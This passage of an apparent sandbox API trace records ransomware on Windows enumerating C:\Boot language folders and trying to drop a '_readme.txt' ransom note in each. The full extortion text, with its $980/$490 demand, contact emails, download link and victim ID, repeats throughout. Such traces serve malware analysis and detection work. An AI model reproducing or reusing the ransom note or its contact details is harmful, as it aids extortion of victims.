worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.995] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0179.995] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0179.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0179.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.996] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*" (normalized: "c:\\boot\\es-es\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0179.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.998] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.998] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.998] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.998] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0179.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0179.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0179.999] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.016] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0180.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.016] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.016] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.016] PathFindFileNameW (pszPath="") returned="" [0180.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.016] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.016] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0180.017] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac4ee0 [0180.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.017] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.017] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0180.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.017] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0180.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.017] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.017] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.018] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.019] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*" (normalized: "c:\\boot\\fi-fi\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.020] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.020] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, 